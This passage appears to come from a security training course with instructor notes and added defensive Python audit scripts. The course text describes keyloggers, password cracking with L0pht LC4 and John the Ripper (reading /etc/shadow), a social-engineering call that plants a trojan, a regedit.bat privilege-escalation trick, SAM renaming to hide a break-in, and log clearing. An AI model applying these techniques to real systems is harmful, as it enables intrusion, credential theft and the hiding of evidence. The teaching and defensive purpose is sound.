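    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+)\s+(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def parse_netstat(text: str) -> List[dict]:
    """Turn netstat -ano text into a list of socket records; headers are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        rows.append({
            "proto": m["proto"],
            "laddr": m["laddr"],
            "lport": int(m["lport"]),
            "raddr": m["raddr"],
            "state": m["state"] or "",
            "pid": int(m["pid"]),
        })
    return rows


def find_unexpected_listeners(rows, pid_to_image, baseline=BASELINE) -> List[dict]:
    """Flag listeners whose port is not in the baseline or is owned by the
    wrong image. Each finding lists the established peers on that port so
    the responder can see who is connected to the suspect socket."""
    findings = []
    for r in rows:
        listening = r["state"] == "LISTENING" or r["proto"] == "UDP"
        if not listening:
            continue
        image = pid_to_image.get(r["pid"], "<unknown>")
        expected = baseline.get((r["proto"], r["lport"]))
        if expected is None:
            reason = "port not in baseline"
        elif expected.lower() != image.lower():
            reason = f"expected {expected}, found {image}"
        else:
            continue
        peers = sorted(
            x["raddr"] for x in rows
            if x["proto"] == r["proto"] and x["lport"] == r["lport"]
            and x["state"] == "ESTABLISHED"
        )
        findings.append({"proto": r["proto"], "port": r["lport"], "pid": r["pid"],
                         "image": image, "reason": reason, "peers": peers})
    return findings


def triage(netstat_text=NETSTAT_SAMPLE, pid_to_image=PID_TO_IMAGE, baseline=BASELINE):
    """Parse and check in one call; returns the list of findings."""
    return find_unexpected_listeners(parse_netstat(netstat_text), pid_to_image, baseline)


if __name__ == "__main__":
    for f in triage():
        peers = ", ".join(f["peers"]) or "none"
        print(f"{f['proto']}/{f['port']} pid {f['pid']} ({f['image']}): "
              f"{f['reason']}; established peers: {peers}")
```

In the constructed sample the script reports both the bare port 2020 shell and the same nc.exe process squatting on the expected telnet port, with the connected peer address for each.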

Topic 8H

Recording Keystrokes

Although the Trojan Horses have their place in attacking computers, they may be more than the attacker needs. Perhaps the only desire is to track the keys that are pressed on a target computer. If this is the case, Trojan Horses, even though they may have this ability, are too much.

Keystroke logging can be one of the most dangerous attacks to deal with, since the program can run below the level of the operating system and, therefore, be close to impossible to detect. There are both hardware- and software-based implementations of keystroke logging.

The level of difficulty of detection can also be connected to the level of difficulty in placing the keystroke-logging application on the target. For example, the hardware keystroke loggers require physical access to the target computer. In the event that physical access is granted, these can be very hard to detect. But, before we get too deep into the world of hardware keylogging, let’s look at a software keylogger.

If time permits and students are interested, have them switch roles and repeat this activity.

Keystroke and Password Attacks


TASK 8H-1

Using Software Keystroke Logging

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and all windows have been closed.

1. Create a new folder named Klogger.

2. Copy the Klogger program from the location specified by your instructor to the new Klogger folder.

3. Double-click Klogger to start the application. The only indication that something is happening is the display of the hourglass icon.

4. Open Notepad, and type a short message to yourself. Then close Notepad; there is no need to save the file.

5. Switch to Explorer, open the Klogger folder, then open the klogger.txt file, and read its contents.

6. Close all open windows, reboot, and log on to Windows 2000 Server as the renamed Administrator account.

Hardware Keyloggers

The smallest loggers are simple devices that are connected between the keyboard cable and the computer. Without physically looking, there is no chance to detect this device.

In the event that even a higher level of stealth is required, the next step is to replace the keyboard altogether. By doing this, there is no clue that there is keystroke logging implemented on this machine. All of the logging is done via a chip embedded in the new keyboard. The attacker needs only to retrieve the keyboard and download the data from the chip.

We can now look at our first hardware keystroke logger. Figure 8-25 shows a small hardware device that can be placed between the keyboard and the computer. Once the device has been installed, the attacker can log keystrokes and collect the data stored inside. The scary part about this kind of device is that it is completely independent of the operating system. A default installation using a device, such as those manufactured by KeyGhost, allows all captured keystrokes to be displayed in any text editor simply by entering the command vghostlog.

Provide students with the location of the Klogger files.


Figure 8-25: A keyboard-logging device. (Picture from keyghost.com.)

INSTRUCTOR TASK 8H-2

Using a Keystroke-logging Keyboard

Objective: To observe the installation and use of a keystroke-logging keyboard.

1. Connect a keyboard that is designed to record keystrokes to your instructor machine. As shown in the graphic below, these types of keyboards usually don’t look any different from a standard keyboard.

2. Once the keyboard has been installed, show the class how it can be used to collect data, as well as how to retrieve the data stored in it.


Topic 8I

Cracking Encrypted Passwords

If getting a physical key-logging device to the target for capturing passwords is not an option, and it often isn’t, the next point a hacker must address is acquiring and cracking passwords. There are many tools available on the Internet for this task, but for class purposes, we will look at three of the most popular ones: L0pht, L0pht LC3, and John the Ripper.

Cracking Passwords with L0pht

One of the most popular password-cracking tools is L0pht. This tool will download the passwords from a target computer, and then crack them. There are many versions of L0pht, and the programmers have now teamed up with a legitimate security company to create commercial products to use. Their commercial products are used as legitimate administration tools to audit the strength of user passwords.

L0pht 2.5

Let’s take a look at one of the older versions of L0pht, version 2.5. In Figure 8-26, you can see that password information has been pulled from the Registry.

Figure 8-26: An older version of L0pht, just after password information has been dumped from the Registry.

Figure 8-27 shows some of the options available in version 2.5 of L0pht.


Figure 8-27: Some of the cracking options available in L0pht 2.5.

And Figure 8-28 shows the successful cracking of passwords.

Figure 8-28: Passwords are cracked!

L0pht LC4

Now that you have seen an older version of L0pht, let’s look at one of its related applications, L0phtCrack 4, or L0pht LC4. Figure 8-29 shows some of the options available in this application for gaining access to the passwords that you want to crack.


Figure 8-29: Options for getting encrypted passwords in L0phtCrack LC4.

Figure 8-30 shows the auditing and password-strength options.

Figure 8-30: L0phtCrack LC4 auditing and password strength options.

Figure 8-31 shows L0pht LC4 in action.


Figure 8-31: Password audit in progress.

TASK 8I-1

Using L0pht LC4

Setup: You are logged on to Windows 2000 Server as the renamed Administrator account.

1. Create a folder named LC4 on your hard drive.

2. Copy the LC4 setup program from the location provided by your instructor to the new LC4 folder.

3. Run LC4setup, accepting all defaults during the installation routine.

4. Open the Custom_GPO you created earlier in the course, and disable all password policies. Close the Custom_GPO when you are finished.

5. Create four new user accounts, assigning passwords as follows:

a. One password that is blank (null).

b. One password that is the same as the user name.

c. One password that contains only numbers.

d. One password that contains only random letters.

6. Start the L0pht LC4 application.

7. Click Trial. The LC4 Wizard opens.

If time is an issue, you can assign one-half of the students to do the L0pht LC4 (Windows 2000) exercise, and the remaining one-half of the students to do the John the Ripper (Linux) exercise, so that everyone can see the differences between the password crackers without having to use both in class.

Provide students with the location of the LC4 installation files.


8. Click Next twice, then click Custom, and click Custom Options.

9. Uncheck Perform A Brute Force Attack On The Passwords, and click OK.

10. Click Next twice, and then click Finish. The password audit starts automatically.

11. While the audit is running, open the Task Manager on your computer, and note your current processor usage.

12. When the Auditing Session Complete message is displayed, click OK.

13. Review the results. At least some of the four easy passwords you assigned during this task should be cracked. The more complex passwords that you created earlier in the course might be only partially cracked.

14. Close all open windows. You do not need to save changes.

Cracking Passwords with John the Ripper

The passwords used in any operating system are critical to protect, and Linux is no different in this regard. Just as there are methods to crack the passwords in Windows NT or Windows 2000, there are methods to crack the passwords in Linux.

Two common password crackers are Crack and John the Ripper. In both cases, it is required to gain access to the password file, then have that file processed by the cracking program.

These programs can use much of a computer’s resources, so running them on a production machine is not a good idea.

John the Ripper is among the newer password crackers available, and has gained great notoriety as it is very fast, and can handle several password hashing algorithms. We will now look at using John the Ripper to crack passwords in Linux (although a version has been ported to NT).

TASK 8I-2

Using John the Ripper

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root.

2. In the /root directory, create a new directory called JohnTR.

3. Copy the John the Ripper installation files from the location provided by your instructor to the new JohnTR directory. In most cases, you will be provided with a compressed file called john-1.6.tar.gz, but if you are provided with a directory called john-1.6, you can skip the next step.

Provide students with the location of the John the Ripper installation files.


4. If necessary, open a Terminal Window, switch to the JohnTR directory, and unzip the john-1.6.tar.gz file by using the gzip -d john-1.6.tar.gz command. This command will unzip the files to a file called john-1.6.tar.

If necessary, untar the john-1.6.tar file by using the tar -xf john-1.6.tar command. This command will untar the file into a directory called john-1.6.

5. Switch to the john-1.6 directory, and list its contents. This directory contains another directory that contains the source files.

6. Switch to the src directory to prepare for the installation.

7. To start the actual installation, enter make to display a list of system types. If your system type is matched, make a note of it.

8. If you have a matching system type, enter make system_type, where system_type is the actual system type of your computer.

If you do not have a matching system type, enter make generic.

This command will start the installation. When it is finished, you will be ready to run the John the Ripper application.

9. To get ready to run the application, enter cd .. to move up one directory, then enter cd run to move into the run directory.

10. In a Terminal Window, create four new user accounts, assigning passwords as follows:

a. One password that is blank (null).

b. One password that is the same as the user name.

c. One password that contains only numbers.

d. One password that contains only random letters.

We now need to combine the password files (/etc/passwd and /etc/shadow) into a single text file first so that we can safely crack them.

11. Enter ./unshadow /etc/passwd /etc/shadow > pwd.txt. Next, we need to change permissions on the text file so that John can work with it.

12. Enter chmod 600 pwd.txt. We are now ready to let John do his work and crack our passwords.

13. Enter ./john pwd.txt.

14. Let the program run, watching for output on your screen. At least some of the passwords should be cracked.

15. When you are ready to move on, close all open windows.

Your instructor can help you determine if you have a matching system type.
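As an added example (not part of the course materials), the following Python script takes the defender's side of both the L0pht LC4 and the John the Ripper tasks: it rejects the four password patterns the tasks deliberately create before an account gets them, merges passwd and shadow the way the unshadow helper in the John the Ripper run directory does, and scans a shadow file for the empty or traditional-DES password fields that a cracker resolves first. The passwd and shadow lines are constructed.

```python
"""Password-policy and shadow-file audit.

Added example, not part of the course material. weak_password_reasons()
rejects the four patterns the tasks create (blank, equal to the user name,
digits only, letters only); unshadow() merges /etc/passwd and /etc/shadow
like the unshadow helper; audit_shadow() flags password fields that need no
cracking at all or use the 8-character DES crypt. All sample lines are
constructed, not taken from a real system.
"""
import re
from typing import Dict, List

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1001:1001:Alice:/home/alice:/bin/bash
bob:x:1002:1002:Bob:/home/bob:/bin/bash
carol:x:1003:1003:Carol:/home/carol:/bin/bash
"""

# Constructed shadow entries: md5crypt, empty field, DES crypt, locked.
SHADOW_SAMPLE = """\
root:$1$Zx9kq2Lm$constructedmd5crypthashXXXXX:12000:0:99999:7:::
alice::12000:0:99999:7:::
bob:abJnggxhB/yWI:12000:0:99999:7:::
carol:!$1$Qw7Lp0Ab$anotherconstructedhashYYYYY:12000:0:99999:7:::
"""


def weak_password_reasons(username: str, password: str) -> List[str]:
    """Return why a candidate password would fall to a wordlist or rules
    run; an empty list means none of the four task patterns applies."""
    reasons = []
    if password == "":
        reasons.append("blank (null) password")
    if password.lower() == username.lower():
        reasons.append("password equals user name")
    if password.isdigit():
        reasons.append("digits only")
    if password.isalpha():
        reasons.append("letters only")
    return reasons


def classify_hash(field: str) -> str:
    """Classify the password field of a shadow entry by its format."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    if field.startswith("$1$"):
        return "md5crypt"
    if field.startswith("$5$"):
        return "sha256crypt"
    if field.startswith("$6$"):
        return "sha512crypt"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "des"
    return "unknown"


def read_shadow(shadow_text: str) -> Dict[str, str]:
    """Map user name -> password field from /etc/shadow text."""
    fields = {}
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        fields[parts[0]] = parts[1] if len(parts) > 1 else ""
    return fields


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Put each shadow hash into the passwd password field, like unshadow."""
    hashes = read_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue  # not a well-formed passwd line
        parts[1] = hashes.get(parts[0], parts[1])
        merged.append(":".join(parts))
    return "\n".join(merged) + "\n"


def audit_shadow(shadow_text: str) -> List[dict]:
    """Flag accounts that log in without a password or whose hash is the
    traditional DES crypt (password truncated to 8 characters)."""
    findings = []
    for user, field in read_shadow(shadow_text).items():
        kind = classify_hash(field)
        if kind == "empty":
            findings.append({"user": user, "hash": kind,
                             "issue": "empty password field: no password needed"})
        elif kind == "des":
            findings.append({"user": user, "hash": kind,
                             "issue": "DES crypt hash: password truncated to 8 characters"})
    return findings


if __name__ == "__main__":
    for u, p in [("alice", ""), ("bob", "bob"), ("carol", "19771031"), ("dave", "qwzplm")]:
        print(u, weak_password_reasons(u, p))
    print(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE))
    for f in audit_shadow(SHADOW_SAMPLE):
        print(f["user"], f["issue"])
```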


Topic 8J

Revealing Hidden Passwords

Using programs such as L0pht is not the only way of identifying passwords of users and applications on a system. Another method is to try to reveal the passwords beneath the asterisks in Windows.

The programs in Windows generally use the asterisks only to mask the true password below. Imagine removing a tablecloth to see the surface of the table below. The passwords are there; it is only a matter of removing the covering.

The tool we will use to do this is called Snadboy’s Revelation. Figure 8-32 and Figure 8-33 show this tool in action. In Figure 8-32, you can see a user’s password being masked by the asterisks.

Figure 8-32: Creating a user and entering a password that is hidden from view by asterisks.

In Figure 8-33, Snadboy’s Revelation shows the unmasked password.


Figure 8-33: Place the crosshairs over the asterisks, and Snadboy’s Revelation will reveal the password for this user.

TASK 8J-1

Revealing Hidden Passwords

1. Log on to Windows 2000 as the renamed Administrator account.

2. Create a new folder on your boot partition named Snadboy.

3. Copy the Snadboy installation program from the location provided by your instructor to the new Snadboy folder.

4. If necessary, unzip the file, and extract it to the Snadboy folder.

5. Run the installation program, accepting all defaults.

6. Run Snadboy’s Revelation.

7. From the Start menu, choose Programs→Accessories→Communications→Internet Connection Wizard. Specify that you want to set up an Internet connection manually, and click Next.

8. Specify that you want to connect through a LAN, and click Next three times.

9. For Display Name, enter test, and for Email Address, enter test@localhost and click Next.

10. For the POP3 and SMTP Server Names, enter localhost and click Next.

11. Leave the Account Name as displayed, enter the password 1qaz!QAZ and leave the Wizard open.

12. Move the Snadboy window to the upper-right corner of your screen.

Provide students with the location of the Snadboy installation files.


13. Move the Wizard window to the lower-left corner of your screen.

14. Observe the Wizard window. The password for the user named test is masked by a series of asterisks.

15. Switch to the Snadboy window, and drag the target-shaped cursor over the masked password, and release the mouse button.

16. Observe the Snadboy window. The masked password is revealed.

17. Close all open windows.

Topic 8K

Social Engineering

Social engineering takes advantage of some inherent human characteristics. Very good hackers, in general, have quite a solid grasp of human psychology. This is an absolute must for the hacker to be able to perform social engineering well. Understanding how people generally react to given predictable situations allows hackers to use this knowledge to elicit the needed responses.

Most social engineering begins with the information learned during the network-reconnaissance and target-acquisition phases of the attack. This information includes phone and fax numbers, IP addresses, physical addresses, DNS names and addresses, router names and addresses, email server names and addresses, billing contact names and email addresses, and so forth. This information provides a good social engineer with most of what is required to begin the attack.

With just the information gained from network reconnaissance, there are several different avenues open to hackers. The two primary methods are to try to take advantage of either the users of the network or the Help Desk of the network. Both methods require roughly the same set of skills from the hacker, so both are used widely. Additionally, for this to be successful, the company needs to be big enough that most employees have never heard of nor seen most of the other employees.

Let’s look at the first method: trying to take advantage of the users of a network. In this scenario, the hacker may call the front desk (any user would normally work, the front desk is just one example) in the guise of being a network administrator of the network. Having learned the name of the network administrator by checking domain name registrations, the hacker calls as the network administrator to the user, requesting information. Many network users will simply respond to what the network administrator wants and needs right away, because they believe that this is the person who controls their network usage. This is one of the key psychological elements that the hacker will exploit.

As the hacker walks the user through a series of questions and scenarios, they are building a relationship with the user. Soon enough, the user will give enough information to allow the hacker to simply walk into the network at will. This method is perhaps the most common social engineering technique, and it is used daily!

Other Attacks


The other method is for the hacker to target the Help Desk for social engineering. This process usually requires a bit more acting ability and a strong personality to pull off. It also requires a decent amount of information about the corporate management of the given target. A name of a person quite high up on the corporate ladder is required. Not high enough so everyone in the company instantly recognizes the name or the voice, but high enough in the structure so that people might feel fear by association of the title.

A common way to get the name of this high-level person is for the hacker to call to set up a fake meeting. The hacker calls reception, and says “Hi, this is John from XYZ. My boss asked me to set up a meeting with your HR Director, but she was leaving the office when she asked me. What is the HR Director’s name again?” You get the idea.

Once the higher-up’s name is known, the hacker can call the Help Desk and begin demanding something like, “My email is not working, reset my password right now, and how do I set it up again?” Instant access to the internal email server!

There are no restrictions on social engineering, which is why it is so effective. The options for a hacker to use social engineering are almost limitless—the only restriction is the overall creativity of the hacker. Perhaps a hacker takes a part-time job at a local ISP for a while to gain intelligence. The entire reason they may be there is to gain a different level of access to information about potential targets.

In any case, whether the target is a user, a Help Desk worker, or corporate clients of an ISP, the general method hackers use is the same—use the human psyche to their advantage.

TASK 8K-1

Discussing Social Engineering Examples

1. Discuss and define examples of how social engineering can be used by an attacker to gain knowledge about a potential target.

Topic 8L

Case Study: Social Engineering

Target: “Good morning, XYZ Corp, how may I direct your call?”

Hacker, with just a bit of authority in the voice: “Good morning, actually I called to speak with you. This is Warren from the Networking Department. Who is this again, just so I’m sure I have the right person?”

Target: “This is John, is there something wrong?”


Hacker grins in response to the question, then: “No, John, not right now, but we are experiencing some intermittent problems. I just stepped out of a meeting with Kevin, and we decided we needed to ask you and a few other users a few questions. They’ll be straightforward, not too technical, so don’t worry. OK, ready?” (Hacker uses a real employee name, gained during network reconnaissance, to help build the image.)

Target: “Um, sure I guess. I’m not that great with the computer in that way. I mean I use Office really well, and stuff, but....”

Hacker: “You’ll be fine, John. Here we go. The first thing I need you to do is open the command prompt. Go to your Run line and type command.”

Hacker waits.

Target: “Where do I type Run?”

Hacker sighs a bit, to pressure the Target, then grins even wider.

Hacker: “No, you don’t type Run. You see the Start button in the lower left-hand corner? Good, click it and go up to where it says Run. See it now? OK, great. You’re doing fine. OK, now type Command. Let me know when the black window opens up on your screen.”

Target: “OK, it’s open now. Now what?”

Hacker: “Good, the first thing I need you to type is called Ipconfig, just type in the letters I-p-c-o-n-f-i-g, then I’ll ask you a few more questions from that screen.”

Target: “How do you spell that again? Oh, never mind—I figured it out. OK, what do you want from this?”

Hacker: “Tell me what it says to the right of where it says IP Address, and where it says Subnet Mask and Default Gateway.”

Hacker waits, then records Target’s responses.

Hacker: “OK, thanks, now I want you to type in something similar, type Ipconfig, space, forward slash all.”

Target: “Uh, OK I got it. This is easy!”

Hacker: “Yes, it is, you’re doing great. Now, tell me what it says to the right of DHCP Enabled, Host Name, Primary DNS Suffix, and DNS Servers....”

Hacker waits again, and records Target’s response.

Target: “OK, wow, that’s a lot of stuff, huh?”

Hacker: “Yes, it can be. OK, we just have a few more. Type in nbtstat, space, minus n. Then tell me what it says to the left of the word group.”

Hacker waits, then records Target’s response.

Target: “What is all this stuff anyway?”

Hacker: “These are the numbers I use to make sure you stay connected to the Internet, and that your email still functions right. By the way, have you had any email problems today?”

Target: “No, not really. At least I don’t think so.”


Hacker: “That’s good, I wasn’t sure if your computer was one of the ones that had a problem yet or not. I’ll send you something in just a minute to check your email configuration. Now one more thing to type in while you are where you are right now. Please type netstat, space, minus a. There might be a bigger list here. The column to the right, where it says State. I need you to find the ones that say listening, and tell me what is to the left, under Proto...Yes, there could be quite a few.”

Hacker records Target’s response.

Target: “Phew, all right is that it?”

Hacker: “Almost. I’m sending you an email configuration program right now.... Hang on....”

Hacker pauses dramatically, then: “OK, you should get it now.”

Target: “OK, what is this?”

Hacker: “Go ahead and double-click that, and tell me what the diagnostic window says when it is done.”

Target: “OK, hang on.... It says email server configuration OK, Client configuration OK. So, that’s good right?”

Hacker: “That is absolutely perfect. I think you may have been one of the lucky ones today. Listen, I have something fun to send you also. Kind of a time killer, just a little fun game. Do you want that? If you don’t want it, that’s OK.”

Target: “Of course, I love those stupid games. What is it?”

Hacker: “It’s a fun, addictive game called Whack-a-Troll. If you like it, go ahead and send it to your friends, I won’t mention it to anyone. We all play it over here, so there is no reason you guys shouldn’t get it, you know?”

Target: “Really, well thanks a lot Warren, I really have to get back to work. So, everything seems ok?”

Hacker: “Yep, seems all good. Have a great day!”

Target: “Thanks, you too. Bye.”

Now, please don’t laugh. Although this scenario illustrates an extreme case, it is not that far off. In this case, the hacker happened to get lucky and get someone on the other line that fit the need just right. Of course, this will not happen often, but odds are that it will happen. Think about what this hacker was able to learn, and do, in just a few short minutes.


TASK 8L-1

Reviewing the Social Engineering Case Study

1. What was this attacker able to learn during the social engineering?

The hacker got all of the internal IP details, an internal domain name, the company DNS server addresses, and the listening ports of this computer! Then, as if that was not enough, the hacker loaded a Trojan Horse in a friendly email sent from a fake address. And, the hacker took the next step of trying to infect the network with the Trojan Horse. Again, all in a few minutes. Only a bit more work, and this attacker will end up with complete control of the entire network!

Topic 8M

Gaining Unauthorized Access

Although many of these hacker tools are effective, they may require access that the attacker cannot get from the Internet to run them. Or, perhaps the antivirus software will detect them, as may be the case for well-known programs like NetBus and SubSeven.

Remember that many people consider the number one threat to network security to be the employees themselves. If the employee has a bit of programming skill, then the threat can become even more difficult.

This section focuses on very simple programming techniques that can be a threat. Obviously, an attacker would not already have access to the machine as an administrator, but this is to show what could be programmed into an attack, which would then be sent to the administrator, in the hopes that he or she would execute it.

Privilege Escalation

Consider the following situation: On a Windows 2000 network, the user WandaB has regular user privileges. She decides that she wants to be a network administrator. Wanda creates the following simple program in Notepad, and saves it with a name such as regedit.bat.

    rem Adds WandaB to the local Administrators group, using the rights of whoever ran the file
    net localgroup administrators WandaB /add
    rem Starts the renamed real Registry Editor so that nothing looks unusual
    start regeditr.exe
    exit

Wanda then arranges (probably by some devious means) for someone who already has administrative access to place the file in the %systemroot% folder of a Windows 2000 Server, rename the original file regedit.exe as regeditr.exe, and reboot the server.

The next time that anyone with administrative privileges tries to edit the Registry of the compromised server by opening the Run dialog box and entering regedit, Wanda’s batch file will run—changing her group membership to Administrators and granting her the privileges of that group. The administrator who ran Regedit will probably not be aware that he or she has done anything unusual, because Wanda’s batch file calls on the renamed Registry Editor.


When a command is entered without an extension, Windows looks for a matching file with the extensions .com, .exe, and then .bat, in that order. This is a simple example of how a user can take advantage of knowing the basics of Windows and programming. The only restriction on how far this can go is the imagination of the user.
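As an added example (not part of the course text), the following Python script models that extension search order to audit a search path for the trick just described: a script that now resolves in place of an expected system binary, or sits beside it waiting for the binary to be renamed. The directory listing, search path and baseline table of expected tools are all constructed for the example.

```python
"""Audit Windows search directories for executable-name shadowing.

Added example, not part of the course material. It models the search order
described in the text (.com, .exe, then .bat) and flags cases like
regedit.bat standing in for a renamed regedit.exe. The listing, path and
baseline below are constructed for the example.
"""
import ntpath

# Search order for an extension-less command name (from the text, plus .cmd).
DEFAULT_PATHEXT = (".com", ".exe", ".bat", ".cmd")

# Constructed listing: %systemroot% after the WandaB trick, plus system32.
SAMPLE_LISTING = {
    r"C:\WINNT": ["regedit.bat", "regeditr.exe", "explorer.exe", "notepad.exe"],
    r"C:\WINNT\system32": ["cmd.exe", "net.exe", "ping.exe", "ping.bat"],
}
SAMPLE_PATH = [r"C:\WINNT", r"C:\WINNT\system32"]

# Constructed baseline: tool name -> directory where its binary belongs.
EXPECTED_TOOLS = {
    "regedit": r"C:\WINNT",
    "notepad": r"C:\WINNT",
    "cmd": r"C:\WINNT\system32",
    "ping": r"C:\WINNT\system32",
}


def resolve_command(name, path_dirs, listing, pathext=DEFAULT_PATHEXT):
    """Return the file Windows would run for `name`: each search directory
    is tried in turn and, within it, each extension in PATHEXT order."""
    base = name.lower()
    for directory in path_dirs:
        present = {f.lower() for f in listing.get(directory, [])}
        for ext in pathext:
            if base + ext in present:
                return ntpath.join(directory, base + ext)
    return None


def audit_shadowing(path_dirs, listing, expected, pathext=DEFAULT_PATHEXT):
    """Return (severity, tool, path) findings for every expected tool.

    HIGH: the name now resolves to a script (or to nothing), so typing the
          tool name runs attacker-supplied commands: the regedit.bat case.
    MED:  the real binary still wins, but a script of the same base name
          sits in the search path, ready to take over if the binary is
          renamed or removed.
    LOW:  the binary resolves from a directory other than its baseline one.
    """
    findings = []
    script_exts = [e for e in pathext if e not in (".com", ".exe")]
    for tool, home in expected.items():
        resolved = resolve_command(tool, path_dirs, listing, pathext)
        if resolved is None:
            findings.append(("HIGH", tool, "missing"))
            continue
        if ntpath.splitext(resolved)[1].lower() in script_exts:
            findings.append(("HIGH", tool, resolved))
            continue
        if ntpath.dirname(resolved).lower() != home.lower():
            findings.append(("LOW", tool, resolved))
        for directory in path_dirs:
            present = {f.lower() for f in listing.get(directory, [])}
            for ext in script_exts:
                if tool + ext in present:
                    findings.append(("MED", tool, ntpath.join(directory, tool + ext)))
    return findings


if __name__ == "__main__":
    for severity, tool, where in audit_shadowing(SAMPLE_PATH, SAMPLE_LISTING, EXPECTED_TOOLS):
        print(f"{severity:4} {tool:8} {where}")
```

On a live system the listing would come from os.listdir() over the PATH directories, and the same audit can be paired with a check of local Administrators membership against a baseline, since that group is what the batch file changes.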

Gaining Unauthorized Rights

Now, assume a curious user exists in your Windows NT network (remember that audits have placed over 70 percent of all network abuse on the shoulders of internal users). This user has normal user rights, but that may not be enough; he or she may want to be a local administrator for his or her own machine. If the system has not been properly patched and updated, this could be easier than you think.

There is a utility called GetAdmin that can give a user administrator-level rights on a machine running Windows NT 4.0 Server, if that server does not have any Service Packs after SP 3 installed. Service Pack 4 actually fixed the security hole that allowed GetAdmin to work. The GetAdmin utility can be found at http://packetstormsecurity.org, and there are other similar utilities that can penetrate a server and assign administrative rights to ordinary users. These utilities can be found on various Web sites such as the one listed here for GetAdmin.

Deleting or Renaming the Security Accounts Manager (SAM)

Using L0pht may work in many given situations; however, the attacker may not have access to this program, or one like it. If this is the case, and the attacker needs to gain access to a Windows NT computer, one last possible attempt is to delete the SAM. The reason this would be considered a last attempt is that it will be found quickly. This section shows how an operating system that is designed to be secure might be compromised with physical access and another operating system.

The Security Accounts Manager is responsible for maintaining all of the user names, passwords, and account properties for the machine. When a machine is freshly installed, by default it has two accounts: Guest and Administrator. As the administrator adds new users and sets passwords for the users, the information is stored in the SAM file. This is all fine until something goes wrong. What happens if the SAM cannot be found when the system boots up? The Microsoft designers thought of this, and if this situation ever occurs, the system will just create a new SAM database with the default values (Guest and Administrator, with null passwords). Good news! The server is saved, right? Well, sort of.

If you need access to the system and the SAM has disappeared, the new SAM might be a good idea. However, if a malicious attacker knows about this design “feature” and can get physical access to the server (such as with NTFSDOS on a floppy disk), he or she could use this knowledge to his or her advantage and purposely delete the SAM, in order to gain access to the system as Administrator!

Because all non-default user accounts and passwords have “disappeared” from the server, the proper administrators of this computer should become aware of the problem fairly quickly and take steps to correct the problem. Although the attack was successful, all the alarms should now be blaring loudly, and going back is not an option.

You may be asking, what else can be done with this technique? Similar to simply deleting the SAM, but even more effective, is to rename the SAM. If an attacker is able to gain physical access to the server, as described earlier, renames the SAM and the event (.evt) and log (.log) files, and reboots the server, he or she will be able to access an otherwise secure server. Once the exploitation is completed, if the attacker deletes the new SAM, event, and log files, restores the original (renamed) SAM, event, and log files, and reboots the server, the attack can be completed without leaving a trace of evidence that the machine was compromised. In addition, the original Administrator account is not modified in any fashion.

At the time of this writing, the latest Service Pack for Windows NT 4.0 was SP 6a.

If students are interested, and you have a machine that has only Windows NT Server (without SP 6a) installed, you can demonstrate how GetAdmin works.

Windows will also create new event and log files if the old ones cannot be found.

GRUB

For default Linux installs, there is an even easier way to gain access to the root account if you have physical access to the system. This access method is built into the operating system in the form of the GRUB Loader.

In Linux, if the attacker has local access to the computer, the job of securing the computer is much more difficult. One option the attacker may use is to simply boot to a different mode. Booting into Single User mode tells the operating system to boot into a mode where networking is disabled and software drivers are not enabled, a mode designed for administrators to work on the OS itself. The console is still available, though, and a user who is logged on in Single User mode has root access.

TASK 8M-1
Investigating the Single User GRUB Loader

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Restart your computer.

2. When you are prompted to choose an operating system, highlight Red Hat Linux, but do not press Enter.

3. Type e then select the line that starts with kernel, and type e again.

4. Press Spacebar and enter single to specify single-user mode.

5. When you are returned to the screen with kernel highlighted, type b to boot the OS. Linux starts in single-user mode.

6. Enter ls -l /root and cat /etc/passwd to test the access you have in single-user mode.

7. Browse to other directories on the hard drive. In single-user mode, you have root access, even though you did not log in as root.

8. Enter shutdown -r now to reboot the computer. Log on to Windows 2000 as the renamed Administrator account.

Single User mode is used to recover the operating system from system crashes, or to regain root access in the event that the root password has been changed or forgotten.

If students choose Red Hat Linux instead of just selecting it, they will need to restart the computer and try again.


Topic 8N
Hiding Evidence of an Attack

Generally, once an attacker has been in a system, it is important that the attacker not leave any traces of the attack. Although it is close to impossible to not leave any trace at all, it is possible to make it hard to locate the attacker, or evidence of the attack.

Clearing Log and Event Files

The two common areas that an attacker will work with to hide the evidence of an attack are the log files and the audit policies. Clearing the audit files will hide much of the evidence of the attack; however, the fact that the logs are cleared should raise red flags to even inexperienced administrators. The event log does not clear itself every now and then!
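Both the SAM-renaming attack in Topic 8M and the log clearing described here leave a break in the Security log's record sequence, which is what an administrator can check for. The following Python continuity check is an added example, not part of the course material; the exported records are constructed, and the event IDs used are the Windows NT/2000 Security log values (517 is "The audit log was cleared").

```python
"""Continuity checks for exported Windows Security-log records.

Added example, not part of the course material. It looks for the traces the
attacks in this lesson leave in the event log: the explicit "audit log
cleared" event, record numbers starting over at 1 (Windows created a fresh
.evt file because the old one was deleted or renamed), numbers jumping
(the original file was put back after a detour through a fresh one), and
time running backwards. The records below are constructed for the example.
"""
from datetime import datetime

# Windows NT/2000 Security log: "The audit log was cleared".
AUDIT_LOG_CLEARED = 517

# Constructed export, in the order a collector received the records:
# (record number, timestamp, event id)
SAMPLE_RECORDS = [
    (1040, "2003-03-10 08:00:00", 528),  # successful logon
    (1041, "2003-03-10 08:05:00", 560),  # object access
    (1042, "2003-03-10 08:06:00", 592),  # new process
    (1, "2003-03-10 23:10:00", 512),     # reboot with the .evt renamed: fresh log
    (2, "2003-03-10 23:11:00", 528),
    (1043, "2003-03-10 23:40:00", 512),  # originals restored, reboot: old numbering resumes
    (1044, "2003-03-10 23:41:00", 528),
    (1045, "2003-03-11 09:00:00", 517),  # the log was cleared outright
    (1, "2003-03-11 09:00:01", 512),
]


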